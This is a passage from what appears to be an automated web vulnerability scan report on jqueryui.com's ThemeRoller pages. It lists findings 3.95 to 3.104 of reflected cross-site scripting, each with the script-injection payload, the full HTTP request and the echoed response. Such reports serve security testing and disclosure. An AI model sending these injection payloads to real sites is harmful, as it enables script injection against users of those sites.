dow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9ccd5"><script>alert(1)</script>cf0fd2d235e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

3.95. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24500"><script>alert(1)</script>c3b535455c0 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=22222224500"><script>alert(1)</script>c3b535455c0&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=22222224500"><script>alert(1)</script>c3b535455c0&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

3.96. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff54"><script>alert(1)</script>46d7472778c was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2ff54"><script>alert(1)</script>46d7472778c&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2ff54"><script>alert(1)</script>46d7472778c&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.97. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ec"><script>alert(1)</script>a651755401d was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545794ec"><script>alert(1)</script>a651755401d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545794ec"><script>alert(1)</script>a651755401d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

3.98. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa755"><script>alert(1)</script>9e8658b4fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?aa755"><script>alert(1)</script>9e8658b4fc4=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117096

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&aa755"><script>alert(1)</script>9e8658b4fc4=1" type="text/css" media="all" />
...[SNIP]...

3.99. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbeff"><script>alert(1)</script>a1aae8f9b17 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxcbeff"><script>alert(1)</script>a1aae8f9b17&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxcbeff"><script>alert(1)</script>a1aae8f9b17&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.100. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d5c6"><script>alert(1)</script>1cf7b57c6b was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4d5c6"><script>alert(1)</script>1cf7b57c6b&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4d5c6"><script>alert(1)</script>1cf7b57c6b&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.101. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5be49"><script>alert(1)</script>a6f58046687 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305be49"><script>alert(1)</script>a6f58046687&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305be49"><script>alert(1)</script>a6f58046687&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

3.102. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54d46"><script>alert(1)</script>95af9515bdf was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3054d46"><script>alert(1)</script>95af9515bdf&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3054d46"><script>alert(1)</script>95af9515bdf&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.103. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1420"><script>alert(1)</script>4061fcc75d1 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxe1420"><script>alert(1)</script>4061fcc75d1&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxe1420"><script>alert(1)</script>4061fcc75d1&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.104. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorActive request parameter is copied into the HTML document as plain text between tags. The payload 6bbb3<script>alert(1)</script>675b0118a3b was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d6bbb3<script>alert(1)</script>675b0118a3b HTTP/1.1
Accept: text/css
